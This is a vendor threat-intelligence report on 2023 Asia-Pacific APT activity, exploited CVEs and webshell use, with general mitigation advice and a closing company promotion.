Executive Summary

The Asia-Pacific region remains a hotbed for cyber threats, with a marked increase in sophisticated attacks targeting critical sectors such as government, IT, and healthcare. This report delves into the latest vulnerabilities, exploits, and Advanced Persistent Threat (APT) groups that are actively operating in the region. Notably, Taiwan, Japan, and South Korea are among the most targeted countries, with Chinese and North Korean APT groups leading the charge. The report also highlights the exploitation of specific vulnerabilities and provides actionable mitigation strategies to safeguard against these threats.

Technical Information

In 2023, the Asia-Pacific region witnessed the active exploitation of at least 37 Common Vulnerabilities and Exposures (CVEs) by threat actors. Among these, CVE-2018-0798 stands out as a significant threat, exploited through spear phishing emails that utilize template injection and macro documents. This vulnerability, known as the "Microsoft Office Memory Corruption Vulnerability," allows remote code execution due to improper handling of objects in memory. It has been prominently featured in the CISA's Known Exploited Vulnerabilities Catalog. Another critical vulnerability, CVE-2022-30190, has been exploited in edge devices that lack adequate security monitoring. Additionally, CVE-2023-38831 has been targeted in various cyber operations, underscoring the need for robust security measures.

The threat landscape is further complicated by the increasing use of shared tools and open-source software by threat actors, which hampers attribution efforts. Webshells, particularly Godzilla and China Chopper, are frequently employed by Chinese APT groups to evade detection. Moreover, cross-platform Remote Access Trojans (RATs) are gaining traction, targeting Windows, Linux, MacOS, and even mobile platforms.

APT groups such as Huapi, Amoeba, Polaris, and the newly active SLIME13 have been particularly aggressive in targeting Taiwan, focusing on sectors like government, IT, and healthcare. In Northeast Asia, Japan and South Korea face persistent threats from Chinese and North Korean actors, with government and cryptocurrency sectors being primary targets. South and Southeast Asia are not spared either, with Chinese groups like Polaris and Amoeba, as well as Vietnamese groups like OceanLotus, actively exploiting geopolitical tensions to launch cyber attacks.

Exploitation in the Wild

APT groups are leveraging vulnerabilities in widely used platforms such as Barracuda, Fortigate, Citrix, and ArrayVPN. These campaigns are characterized by their stealth and persistence, often going undetected for extended periods. Indicators of Compromise (IOCs) include unusual network traffic patterns, unauthorized access attempts, and the presence of known malicious webshells.

APT Groups using this vulnerability

Chinese APT groups are at the forefront of exploiting these vulnerabilities, known for their sophisticated operations and use of shared tools. They target a wide range of sectors, including IT and critical infrastructure. North Korean actors are also active, focusing on geopolitical intelligence and financial gain, often targeting cryptocurrency sectors. Vietnamese APT groups, such as OceanLotus, are active both domestically and internationally, with a focus on neighboring countries.

Affected Product Versions

The vulnerabilities discussed affect a range of products and versions. CVE-2018-0798 impacts Microsoft Office versions that have not been updated to address the memory corruption flaw. CVE-2022-30190 affects edge devices lacking security monitoring, while CVE-2023-38831 targets various software platforms that have not implemented the latest security patches.

Workaround and Mitigation

Organizations in the Asia-Pacific region should prioritize enhancing their threat intelligence capabilities to anticipate and respond to emerging threats. Regular updates and patches for known vulnerabilities are crucial to prevent exploitation. Implementing robust monitoring solutions for edge devices and web servers can help detect and mitigate attacks early. Additionally, organizations should consider deploying advanced endpoint protection solutions and conducting regular security audits to identify and address potential vulnerabilities.

References

For further reading and detailed threat intelligence, please refer to the following sources: TeamT5: APT Threat Landscape in APAC 2023 (https://www.teamt5.org), Cyberint: Top Asian/APAC Cybersecurity Threats of 2023 (https://www.cyberint.com), and DarkReading: China-Backed APT Group Culling Thai Government Data (https://www.darkreading.com).

Rescana is here for you

At Rescana, we are committed to helping our customers navigate the complex cybersecurity landscape with our Continuous Threat and Exposure Management (CTEM) platform. Our solutions are designed to provide comprehensive threat intelligence and proactive defense strategies. Should you have any questions about this report or any other cybersecurity concerns, please do not hesitate to contact us at ops@rescana.com. We are here to support you in safeguarding your organization against evolving cyber threats.